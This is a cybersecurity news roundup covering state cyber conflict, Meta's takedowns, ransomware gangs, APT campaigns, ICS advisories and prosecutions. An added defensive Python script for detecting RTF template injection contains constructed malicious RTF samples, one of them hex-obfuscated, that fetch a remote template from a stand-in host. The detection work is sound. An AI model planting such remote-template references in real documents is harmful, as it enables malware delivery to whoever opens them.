The still-unformed laws of conflict in cyberspace.
One of the central jus in bello concerns the laws of armed conflict seek to address is the distinction between combatant and noncombatant, between soldier and civilian. The shadow, quasi-cyberwar between Iran and Israel seems not only to be intensifying but also, according to the New York Times (which attributes its conclusions to anonymous US intelligence sources), to be entering a phase in which both sides are willing to hit clearly civilian targets. An attack that disrupted Iranian fuel stations and the doxing of Israeli participants in an LGBTQ online community both represented themselves as hacktivists' work, but both incidents seem to be the work of fronts run from Jerusalem and Tehran.
Meta reports on adversarial networks.
Facebook's parent Meta this week released its end-of-year Adversarial Threat Report. It concentrates on what Meta calls "Coordinated Inauthentic Behavior (CIB), Brigading and Mass Reporting." Coordinated inauthentic behavior is familiar, but brigading and mass reporting deserve some explanation.
Brigading involves an "adversarial network" whose participants cooperate "to mass comment, mass post or engage in other types of repetitive mass behaviors to harass others or silence them,” which sounds like trolling scaled to an industrial size.
Mass reporting, also characterized as involving an adversarial network, occurs when "people work together to mass-report an account or content to get it incorrectly taken down from our platform." That is, people combine to falsely allege violations of policy in an attempt to get someone banned from Facebook or any other Meta platform. The “reporting” in this case is reporting in the sense of diming someone out to the platform.
Meta took down four coordinated inauthentic behavior networks in China, Palestine, Poland, and Belarus. One network in Italy and France was disabled for brigading, and one network in Vietnam was removed for mass reporting. The brigading in Italy and France Meta attributes to a conspiracy movement, not obviously connected to any government. Matters are different with the mass reporting activity, which seems to have been coordinated by the government of Vietnam. The coordinated inauthenticity also looks government-directed, but it's worth noting that governments, which remain responsible for a good fraction of the adversarial networks Facebook (and its parent Meta) is concerned about, are now also outsourcing disinformation operations to contractors. Not only may this make economic sense, but it also affords a degree of deniability and greater opportunities for amplification of messaging by state-controlled media.
Ransomware actor rebrands.
Mandiant on Monday released a report on Sabbath (the gang refers to itself by the Leet numeronym "54BB47h"), which opened a ransomware "shaming" site on October 21st. Sabbath isn't actually new. Mandiant researchers have determined, on the basis of the CobaltStrike BEACON infrastructure Sabbath uses, that it is in fact a rebranding of a ransomware affiliate operation that earlier went by the names "Eruption" and, more recently, "Arcane." Mandiant tracks the gang as UNC2190, and says it's made a specialty of targeting "critical infrastructure including education, health, and natural resources in the United States and Canada."
Pharmaceutical company sustains ransomware attack.
Supernus Pharmaceuticals on Friday filed an 8-K with the US Securities and Exchange Commission disclosing that it sustained a ransomware attack that began in mid-November. The company is cautiously optimistic, saying that it contained the damage without disruption to its operations and isn't paying the ransom, but that it can't rule out reattacks or malicious use of stolen data. SecurityWeek says that the Hive ransomware gang claimed responsibility on Thanksgiving, anticipating the 8-K by a day.
Smishing campaign targets Iranians.
The Hill reports that a financially-motivated smishing campaign is active against Iranian Android users. The campaign was discovered by researchers at Check Point, who stated, "In the midst of major cyber attacks targeting the general population of Iran, Check Point Research (CPR) sees another significant cyber attack campaign, where socially engineered SMS messages are being used to target Iran’s citizens. Designed to impersonate the Iranian government, the fraudulent SMS messages lure victims into downloading malicious Android applications related to official Iranian services, such as the Iranian Electronic Judicial Services. In turn, these malicious applications convince their victims to offer up sensitive data: credit card credentials and two-factor authentication codes. From there, the threat actors go on to perform unauthorized withdrawals from the credit card accounts of their victims."
Check Point estimates that an average of US$1,000 to $2,000 was stolen from each victim.
SideCopy targets Afghanistan.
Malwarebytes has released additional information on SideCopy, a Pakistani APT that Facebook last month had identified as prospecting personnel of the former, pre-Taliban government of Afghanistan. SideCopy used new variants of the Stealer data-theft tool; the information it collected included "access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents."
Malwarebytes notes, "The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials. The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures."
State-sponsored actors using RTF template injection.
Proofpoint describes an attack technique recently favored by state agencies: RTF template injection. The APTs using the technique are associated with China, Russia, and India. The approach itself isn't new, but its ready availability, effectiveness, and ease-of-use have made it attractive to APTs. Proofpoint expects to see the usual trickle-down effect, with criminal gangs following the trail blazed by intelligence services.
Proofpoint stated, "Template injection RTF files attributable to the APT group DoNot Team, that has historically been suspected of being aligned with Indian-state interests, were identified through July 8, 2021. RTF files likely attributable to a Chinese-related APT actor were identified as recently as September 29, 2021, targeting entities with ties to Malaysian deep water energy exploration. Following this initial adoption period, the APT actor Gamaredon, which has been linked to the Russian Federal Security Service (FSB), was later observed utilizing RTF template injection files in campaigns that leveraged Ukrainian governmental file lures on October 5, 2021."
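For defenders who want to triage incoming RTF attachments for the technique described above, the following is an added example (not code from Proofpoint or from the source article). It rests on one assumption stated here: RTF template injection works by placing a remote location in the document's `\*\template` control word so that the word processor fetches that "template" when the file is opened, and the destination may be hidden behind standard RTF `\'hh` hex escapes. The sample RTF strings are constructed for the test and contain no live URLs; the hostnames use the reserved `.invalid` TLD.

```python
import re

# Constructed sample documents (not real malware). A benign report, a local
# template reference, an injected remote template, and the same injection with
# the scheme hidden behind RTF \'hh hex escapes.
BENIGN_RTF = rb"{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}} Quarterly report.\par}"
LOCAL_TEMPLATE_RTF = rb"{\rtf1\ansi {\*\template C:\\Users\\me\\Normal.dotm} Memo.\par}"
INJECTED_RTF = rb"{\rtf1\ansi\deff0 {\*\template http://example.invalid/tpl.dotm} Hello\par}"
HEX_RTF = rb"{\rtf1\ansi {\*\template \'68\'74\'74\'70://example.invalid/t.dotm}\par}"

# \'hh is the RTF escape for a single byte given in hex.
HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# {\*\template <destination>} -- capture everything up to the closing brace.
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template\s*([^}]*)\}", re.IGNORECASE)
# Destinations that leave the machine: web URLs, UNC paths, ftp/file schemes.
REMOTE_REF = re.compile(rb"^(https?://|ftp://|file://|\\\\)", re.IGNORECASE)


def normalise_rtf(data: bytes) -> bytes:
    """Decode \\'hh hex escapes so an obfuscated destination reads as plain bytes."""
    return HEX_ESCAPE.sub(lambda m: bytes.fromhex(m.group(1).decode("ascii")), data)


def find_template_refs(data: bytes) -> list:
    """Return every \\*\\template destination found in the document, escapes decoded."""
    text = normalise_rtf(data)
    return [m.group(1).strip() for m in TEMPLATE_GROUP.finditer(text)]


def is_remote_template_injection(data: bytes) -> bool:
    """True when any template destination points off the local machine."""
    return any(REMOTE_REF.match(ref) for ref in find_template_refs(data))


def triage(name: str, data: bytes) -> dict:
    """Summarise one attachment for an analyst or a SIEM enrichment step."""
    refs = find_template_refs(data)
    return {
        "file": name,
        "template_refs": [r.decode("latin-1") for r in refs],
        "remote_template": is_remote_template_injection(data),
    }


if __name__ == "__main__":
    samples = {
        "benign.rtf": BENIGN_RTF,
        "local_template.rtf": LOCAL_TEMPLATE_RTF,
        "injected.rtf": INJECTED_RTF,
        "hex_obfuscated.rtf": HEX_RTF,
    }
    for name, data in samples.items():
        print(triage(name, data))
```

Because the check decodes hex escapes before matching, a destination split across `\'hh` sequences is treated the same as one written in clear text; a local template path such as `C:\Users\...` is reported but not flagged, since legitimate documents reference local templates. A hit on a remote destination is a reason to detonate the file in a sandbox or block it at the mail gateway, not a conviction by itself.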
North Korean threat actors continue posing as job recruiters.
Among the revelations of last week's Google Threat Horizons report is an account of how North Korean operators approached South Korean targets online by posing as Samsung recruiters. The report stated, "TAG observed a North Korean government-backed attacker group that previously targeted security researchers posing as recruiters at Samsung and sending fake job opportunities to employees at multiple South Korean information security companies that sell anti-malware solutions. The emails included a PDF allegedly claiming to be of a job description for a role at Samsung; however, the PDFs were malformed and did not open in a standard PDF reader. When targets replied that they could not open the job description, attackers responded with a malicious link to malware purporting to be a ‘Secure PDF Reader’ stored in Google Drive which has now been blocked."
Patch news.
CISA released seven industrial control system advisories on Tuesday. The affected products, for which patches and mitigations are available, include Xylem Aanderaa GeoView, Mitsubishi Electric MELSEC and MELIPC Series, Delta Electronics CNCSoft, Johnson Controls CEM Systems AC2000, Hitachi Energy Retail Operations and CSB Software, InHand Networks IR615 Router, and Multiple RTOS. On Thursday the agency published eight more: Schneider Electric SESU, Johnson Controls Entrapass, Distributed Data Systems WebHMI, Hitachi Energy RTU500 series BCI, Hitachi Energy Relion 670/650/SAM600-IO, Hitachi Energy APM Edge, Hitachi Energy PCM600 Update Manager, and Hitachi Energy RTU500 series.
Crime and punishment.
Aleksandr Grichishkin, one of the founders and the effective leader of a bulletproof hosting service that catered to cyber gangs, has been sentenced by the US District Court for the Eastern District of Michigan, Southern Division, to a term of five years on a RICO beef. Mr. Grichishkin took a guilty plea to one count of Conspiracy to Engage in a Racketeer Influenced Corrupt Organization. His co-defendants, who also pleaded guilty, were sentenced earlier. The US Attorney’s sentencing memorandum outlines the services Grichishkin’s operation provided. He and his colleagues were in the infrastructure business, and delivered the IP addresses, domains, and servers their gangland customers used, as BleepingComputer lists them, “to distribute malware, host phishing kits, breach targets' networks, build botnets, and steal banking credentials.” The malware they supported forms a familiar list: Zeus, SpyEye, Citadel, and Blackhole. The Financial Services Information Sharing and Analysis Center, FS-ISAC, informed the court that SpyEye and Zeus alone cost banks about $111 million in 2011 alone, and that FS-ISAC regards that figure as a low estimate.
The US Department of Justice has also announced the indictment and arrest of Mr. Nickolas Sharp, formerly employed by Ubiquiti Networks, on four counts of computer-related crime. The Verge has a useful summary of the case. Back in January Ubiquiti, which makes prosumer routers and access points, notified users that it had sustained a data breach in the course of which unauthorized parties may have accessed company information. In March a whistleblower told media outlets that matters were far worse than Ubiquiti had let on, and that it had covered up a “catastrophic” data breach. That whistleblower was apparently Mr. Sharp, and, if the Feds’ indictment is borne out at trial (since of course Mr. Sharp is entitled to a presumption of innocence), he was not only responsible for the initial data breach itself, but also for using his whistleblowing to ratchet up extortion pressure on the company.
TASS is authorized to disclose that Russian President Vladimir Putin, noting the increased rate at which Russia itself experiences cybercrime, said, "We suffer from this ourselves. We understand the importance of joint work on this track and we will be doing it." So compare and contrast the following three cases.
First, consider a Daily Mail story: “REvil 'super-hacker' wanted by FBI for 'using ransomware to fleece millions of dollars' from Americans is unmasked by DailyMail.com in his plush hideout in Siberia as Kremlin turns blind eye,” reads the Mail’s unusually detailed screamer. The tabloid’s talking about Mr. Yevgeniy Polyanin, a Russian national 28 years young, whom we’ve heard of before as being wanted by US authorities for his alleged role in the REvil gang. The Mail’s newshounds have tracked him to “a $380,000 home in the Siberian city of Barnaul, where his wife, Sofia, openly runs a social media baking business.” The Mail adds that Mr. Polyanin has been “seen in Barnaul driving a $74,000 Toyota Land Cruiser,” and that he owns another car worth maybe a cool $108,000. It would be a stretch to characterize him as being even nominally on the lam. This lifestyle sounds more provincial upper-middle class than big-time crime lord (maybe upper-upper middle class, given that he’s living in Siberia), and it’s certainly a far cry from living on a yacht in the Black Sea and collecting gold chains and exotic cats, but the Mail is absolutely on point when it says it’ll be a hot winter in Chelyabinsk before Mr. Polyanin or his colleagues are extradited to face American law.
Second, consider an actual Russian prosecution. Bloomberg Businessweek describes Russia's ongoing treason prosecution of Group-IB executive Ilya Sachkov. The Kremlin believes him responsible for tipping the US off to Fancy Bear's election-influence activities. Conviction will get him twenty years in a labor camp.
And third, contrast the outcome of another trial in Russia, where a Russian court has passed sentence on Maxim Zhukov for the leading role he played in coding for the FIN7 gang. He received, the Record reports, a one-year suspended sentence and a year's probation. That's less than the time Sachkov has already served awaiting trial.
Lest the Americans get above themselves and start feeling too smug when standing next to the Russians in this particular line-up of risible prosecutions, there's more in the (alas) continuing case of responsible disclosure in the US state of Missouri. The Saint Louis Post-Dispatch updates the discreditable episode in which the Governor of Missouri denounced one of the paper's reporters as a criminal hacker for disclosing the discovery of an exposed database to the Department of Elementary and Secondary Education. Apparently the Department had prepared a statement thanking the reporter for bringing the matter to their attention; that statement was quashed and preempted by the Governor's call for prosecution. Come on, Show Me State: show us something.
Policies, procurements, and agency equities.
Israel's government has restricted the sale of intercept tools (notably NSO Group's Pegasus software) to just thirty-seven countries, down from the previous one-hundred two, Calcalist reports.
Just before the Thanksgiving holiday the US Commerce Department added twenty-eight organizations to its Entity List of sanctioned groups. The countries most directly affected are China (for a range of technologies, including quantum computing with military applications), Pakistan (for ballistic missile proliferation), and Russia (for military R&D).
Tensions between Russia and Ukraine remain high. The US embassy in Kiev last week reiterated warnings to travelers urging them to avoid the Crimea and Ukraine's eastern regions. The AP reported Saturday that Ukrainian President Zelensky said Kiev's intelligence services had uncovered Russian plans for a coup d'état in Ukraine within the week. Cyber operations can be expected to keep pace with the conflict.
A report the US Government Accountability Office (GAO) delivered to Congress on Thursday argues that US critical infrastructure remains at serious risk. The report complains of a lack of a comprehensive cybersecurity strategy, and concludes, "the federal government needs to move with a greater sense of urgency in response to the serious cybersecurity threats faced by the nation and its critical infrastructure."
CISA has named the first members of its Cybersecurity Advisory Committee (the “CSAC”). The agency describes the Advisory Committee as “comprised of the nation’s leading experts on cybersecurity, technology, risk management, privacy, and resilience. They bring a diverse set of experiences and perspectives and will empanel a set of subcommittees focused on addressing key focus areas.” The appointments just announced represent the first twenty-three members. The CSAC may ultimately have up to thirty-five members.
The Advisory Committee was established in June of this year, and was designed to bring the CISA Director advice on cybersecurity from the perspective not only of industry, but also of state, local, and tribal governments. CISA says that “Committee members—with subject matter expertise in various critical infrastructure sectors—participate in the development, refinement, and implementation of recommendations, policies, programs, planning, and training pertaining to CISA’s cybersecurity mission.” The CSAC will also form subcommittees as the CISA Director decides. Subcommittees would study special topics of importance to the agency’s mission.